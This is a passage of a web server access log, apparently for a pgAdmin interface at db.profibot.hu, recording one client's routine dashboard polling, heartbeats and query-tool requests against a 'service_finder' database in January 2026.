84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:48:38 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:48:43 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:48:48 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:48:53 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:48:58 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:49:03 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:49:07 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:49:08 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:49:13 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:49:18 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:49:23 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:49:28 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:49:33 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:49:37 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:49:38 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:49:50 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:49:50 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:49:52 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:49:52 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:49:53 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:49:54 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:49:56 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 138] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:49:56 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 366] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:49:56 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:49:56 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:49:57 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:49:58 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:50:00 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:50:02 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:50:02 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:50:07 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:50:08 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:50:13 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:50:18 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:50:23 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:50:28 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:50:33 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:50:37 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:50:38 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:50:43 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:50:48 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:50:53 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:50:58 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:51:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:51:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:51:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:52:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:52:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:53:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:53:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:54:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:54:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:55:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:55:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:56:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:56:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:56:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:57:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:57:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:58:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:58:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:59:25 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:59:25 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:59:25 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:59:27 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:59:27 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:59:28 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:59:29 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:59:30 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 138] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:59:30 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 315] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 